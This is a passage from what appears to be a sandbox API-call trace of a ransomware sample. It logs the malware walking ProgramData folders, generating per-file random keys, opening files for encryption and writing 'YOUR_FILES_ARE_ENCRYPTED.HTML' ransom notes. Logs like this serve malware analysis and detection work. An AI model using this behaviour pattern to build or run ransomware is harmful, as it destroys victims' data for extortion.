RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0156.958] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat" (normalized: "c:\\programdata\\microsoft\\officesoftwareprotectionplatform\\tokens.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x4a8 [0156.958] GetFileSizeEx (in: hFile=0x4a8, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=2811722) returned 1 [0156.958] GetProcessHeap () returned 0x270000 [0156.958] RtlAllocateHeap (HeapHandle=0x270000, 
Flags=0x8, Size=0x28150) returned 0x74c2008 [0156.962] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="C1") returned 2 [0156.962] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="21") returned 2 [0156.962] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="F1") returned 2 [0156.962] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="26") returned 2 [0156.962] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="0E") returned 2 [0156.962] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="B0") returned 2 [0156.962] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="98") returned 2 [0156.962] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="5A") returned 2 [0156.962] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="FD") returned 2 [0156.962] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="09") returned 2 [0156.963] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="4E") returned 2 [0156.963] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="1B") returned 2 [0156.963] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="51") returned 2 [0156.963] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="2A") returned 2 [0156.963] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="95") returned 2 [0156.963] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="79") returned 2 [0156.963] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="D1") returned 2 [0156.963] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="09") returned 2 [0156.963] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="C8") returned 2 [0156.963] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="CD") returned 2 [0156.963] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="69") returned 2 [0156.963] wsprintfW 
(in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="78") returned 2 [0156.963] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="2C") returned 2 [0156.963] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="52") returned 2 [0156.963] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="12") returned 2 [0156.963] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="B1") returned 2 [0156.963] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="0A") returned 2 [0156.963] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="A3") returned 2 [0156.963] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="C7") returned 2 [0156.963] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="C5") returned 2 [0156.963] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="0D") returned 2 [0156.963] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="4B") returned 2 [0156.964] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat") returned="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat" [0156.964] CreateIoCompletionPort (FileHandle=0x4a8, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0156.964] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0156.964] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8151b0f0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xd2cc8ee0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xe234d540, 
ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x2ae74a, dwReserved0=0x0, dwReserved1=0x60, cFileName="tokens.dat", cAlternateFileName="")) returned 0 [0156.964] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0156.964] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 91 [0156.964] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\officesoftwareprotectionplatform\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x598 [0156.965] WriteFile (in: hFile=0x598, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0156.967] CloseHandle (hObject=0x598) returned 1 [0156.968] GetProcessHeap () returned 0x270000 [0156.969] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0156.969] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f2fe55, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9f55fb4, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xf9f55fb4, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="RAC", cAlternateFileName="")) returned 1 [0156.969] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC") returned 32 [0156.969] GetProcessHeap 
() returned 0x270000 [0156.969] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74ea160 [0156.970] lstrcpyW (in: lpString1=0x74ea160, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\RAC" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC") returned="\\\\?\\C:\\ProgramData\\Microsoft\\RAC" [0156.970] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\*" [0156.970] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f2fe55, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9f55fb4, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xf9f55fb4, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0156.970] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f2fe55, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9f55fb4, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xf9f55fb4, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0156.970] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f2fe55, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9f2fe55, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x89995398, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, 
nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Outbound", cAlternateFileName="")) returned 1 [0156.970] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Outbound") returned 41 [0156.970] GetProcessHeap () returned 0x270000 [0156.970] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0156.971] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Outbound" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Outbound") returned="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Outbound" [0156.971] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Outbound", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Outbound\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Outbound\\*" [0156.971] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Outbound\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f2fe55, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9f2fe55, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x89995398, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0156.972] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f2fe55, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9f2fe55, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x89995398, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0156.972] FindNextFileW (in: 
hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f2fe55, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9f2fe55, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x89995398, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0156.972] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0156.972] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Outbound\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 71 [0156.972] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Outbound\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\rac\\outbound\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0156.973] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0156.975] CloseHandle (hObject=0x5a0) returned 1 [0156.976] GetProcessHeap () returned 0x270000 [0156.976] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0156.976] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f2fe55, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x9ada4280, ftLastAccessTime.dwHighDateTime=0x1d7e775, ftLastWriteTime.dwLowDateTime=0x9ada4280, ftLastWriteTime.dwHighDateTime=0x1d7e775, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, 
dwReserved1=0x60, cFileName="PublishedData", cAlternateFileName="PUBLIS~1")) returned 1 [0156.976] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\PublishedData") returned 46 [0156.976] GetProcessHeap () returned 0x270000 [0156.977] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0156.977] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\PublishedData" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\PublishedData") returned="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\PublishedData" [0156.977] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\PublishedData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\*" [0156.977] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f2fe55, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x9ada4280, ftLastAccessTime.dwHighDateTime=0x1d7e775, ftLastWriteTime.dwLowDateTime=0x9ada4280, ftLastWriteTime.dwHighDateTime=0x1d7e775, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0156.977] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f2fe55, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x9ada4280, ftLastAccessTime.dwHighDateTime=0x1d7e775, ftLastWriteTime.dwLowDateTime=0x9ada4280, ftLastWriteTime.dwHighDateTime=0x1d7e775, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0156.977] FindNextFileW 
(in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7fa373b0, ftCreationTime.dwHighDateTime=0x1d706a2, ftLastAccessTime.dwLowDateTime=0x9ada4280, ftLastAccessTime.dwHighDateTime=0x1d7e775, ftLastWriteTime.dwLowDateTime=0xafec2e40, ftLastWriteTime.dwHighDateTime=0x1d7e775, nFileSizeHigh=0x0, nFileSizeLow=0x45000, dwReserved0=0x0, dwReserved1=0x60, cFileName="RacWmiDatabase.sdf", cAlternateFileName="RACWMI~1.SDF")) returned 1 [0156.977] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf") returned 65 [0156.977] lstrcmpW (lpString1="RacWmiDatabase.sdf", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.977] PathFindExtensionW (pszPath="RacWmiDatabase.sdf") returned=".sdf" [0156.977] lstrlenW (lpString=".sdf") returned 4 [0156.977] PathFindExtensionW (pszPath="RacWmiDatabase.sdf") returned=".sdf" [0156.977] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0156.977] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" (normalized: "c:\\programdata\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0156.978] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7fa373b0, ftCreationTime.dwHighDateTime=0x1d706a2, ftLastAccessTime.dwLowDateTime=0x9ada4280, ftLastAccessTime.dwHighDateTime=0x1d7e775, ftLastWriteTime.dwLowDateTime=0xafec2e40, ftLastWriteTime.dwHighDateTime=0x1d7e775, nFileSizeHigh=0x0, nFileSizeLow=0x45000, dwReserved0=0x0, dwReserved1=0x60, cFileName="RacWmiDatabase.sdf", 
cAlternateFileName="RACWMI~1.SDF")) returned 0 [0156.978] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0156.978] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 76 [0156.978] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\rac\\publisheddata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0156.978] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0157.136] CloseHandle (hObject=0x5a0) returned 1 [0157.137] GetProcessHeap () returned 0x270000 [0157.138] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0157.138] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f2fe55, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xafe9cce0, ftLastAccessTime.dwHighDateTime=0x1d7e775, ftLastWriteTime.dwLowDateTime=0xafe9cce0, ftLastWriteTime.dwHighDateTime=0x1d7e775, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="StateData", cAlternateFileName="STATED~1")) returned 1 [0157.138] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData") returned 42 [0157.138] GetProcessHeap () returned 0x270000 [0157.139] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0157.139] lstrcpyW (in: 
lpString1=0x74fa168, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData") returned="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData" [0157.139] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\*" [0157.139] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f2fe55, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xafe9cce0, ftLastAccessTime.dwHighDateTime=0x1d7e775, ftLastWriteTime.dwLowDateTime=0xafe9cce0, ftLastWriteTime.dwHighDateTime=0x1d7e775, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0157.139] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f2fe55, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xafe9cce0, ftLastAccessTime.dwHighDateTime=0x1d7e775, ftLastWriteTime.dwLowDateTime=0xafe9cce0, ftLastWriteTime.dwHighDateTime=0x1d7e775, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0157.140] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7f5747b0, ftCreationTime.dwHighDateTime=0x1d706a2, ftLastAccessTime.dwLowDateTime=0x7f5747b0, ftLastAccessTime.dwHighDateTime=0x1d706a2, ftLastWriteTime.dwLowDateTime=0xafee8fa0, ftLastWriteTime.dwHighDateTime=0x1d7e775, nFileSizeHigh=0x0, nFileSizeLow=0x85000, dwReserved0=0x0, dwReserved1=0x60, 
cFileName="RacDatabase.sdf", cAlternateFileName="RACDAT~1.SDF")) returned 1 [0157.140] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf") returned 58 [0157.140] lstrcmpW (lpString1="RacDatabase.sdf", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.140] PathFindExtensionW (pszPath="RacDatabase.sdf") returned=".sdf" [0157.140] lstrlenW (lpString=".sdf") returned 4 [0157.140] PathFindExtensionW (pszPath="RacDatabase.sdf") returned=".sdf" [0157.140] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0157.140] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf" (normalized: "c:\\programdata\\microsoft\\rac\\statedata\\racdatabase.sdf"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0157.140] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e59a53, ftCreationTime.dwHighDateTime=0x1cb88f6, ftLastAccessTime.dwLowDateTime=0x3e59a53, ftLastAccessTime.dwHighDateTime=0x1cb88f6, ftLastWriteTime.dwLowDateTime=0xafee8fa0, ftLastWriteTime.dwHighDateTime=0x1d7e775, nFileSizeHigh=0x0, nFileSizeLow=0x8, dwReserved0=0x0, dwReserved1=0x60, cFileName="RacMetaData.dat", cAlternateFileName="RACMET~1.DAT")) returned 1 [0157.140] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacMetaData.dat") returned 58 [0157.140] lstrcmpW (lpString1="RacMetaData.dat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.140] PathFindExtensionW (pszPath="RacMetaData.dat") returned=".dat" [0157.140] lstrlenW (lpString=".dat") returned 4 [0157.140] PathFindExtensionW 
(pszPath="RacMetaData.dat") returned=".dat" [0157.140] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0157.140] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacMetaData.dat" (normalized: "c:\\programdata\\microsoft\\rac\\statedata\\racmetadata.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0157.141] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xafe9cce0, ftCreationTime.dwHighDateTime=0x1d7e775, ftLastAccessTime.dwLowDateTime=0xafe9cce0, ftLastAccessTime.dwHighDateTime=0x1d7e775, ftLastWriteTime.dwLowDateTime=0xafe9cce0, ftLastWriteTime.dwHighDateTime=0x1d7e775, nFileSizeHigh=0x0, nFileSizeLow=0x401c, dwReserved0=0x0, dwReserved1=0x60, cFileName="RacWmiDataBookmarks.dat", cAlternateFileName="RACWMI~2.DAT")) returned 1 [0157.141] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacWmiDataBookmarks.dat") returned 66 [0157.141] lstrcmpW (lpString1="RacWmiDataBookmarks.dat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.141] PathFindExtensionW (pszPath="RacWmiDataBookmarks.dat") returned=".dat" [0157.141] lstrlenW (lpString=".dat") returned 4 [0157.141] PathFindExtensionW (pszPath="RacWmiDataBookmarks.dat") returned=".dat" [0157.141] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0157.141] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacWmiDataBookmarks.dat" (normalized: "c:\\programdata\\microsoft\\rac\\statedata\\racwmidatabookmarks.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 
